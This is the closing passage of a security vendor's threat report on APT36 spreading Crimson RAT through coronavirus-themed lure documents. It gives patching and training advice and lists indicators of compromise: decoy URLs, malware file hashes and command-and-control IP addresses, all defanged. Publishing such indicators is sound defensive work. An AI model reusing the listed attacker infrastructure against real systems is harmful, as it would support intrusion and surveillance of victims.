Shoring up vulnerabilities by keeping all software (including Microsoft Excel and Word) up-to-date shields against exploit attacks. In addition, training employees and users to avoid opening coronavirus resources from unvetted sources can protect against this and other social engineering attacks from threat actors.

Malwarebytes users are protected against this attack. We block the malicious macro execution as well as its payload with our application behavior protection layer and real-time malware detection.

Indicators of Compromise

Decoy URLs

email.gov.in.maildrive[.]email/?att=1579160420
email.gov.in.maildrive[.]email/?att=1581914657

Decoy documents

876939aa0aa157aa2581b74ddfc4cf03893cede542ade22a2d9ac70e2fef1656
20da161f0174d2867d2a296d4e2a8ebd2f0c513165de6f2a6f455abcecf78f2a

Crimson RAT

0ee399769a6e6e6d444a819ff0ca564ae584760baba93eff766926b1effe0010 b67d764c981a298fa2bb14ca7faffc68ec30ad34380ad8a92911b2350104e748

C2s

107.175.64[.]209 64.188.25[.]205 MITRE ATT&CK

https://attack.mitre.org/software/S0115/

The post APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds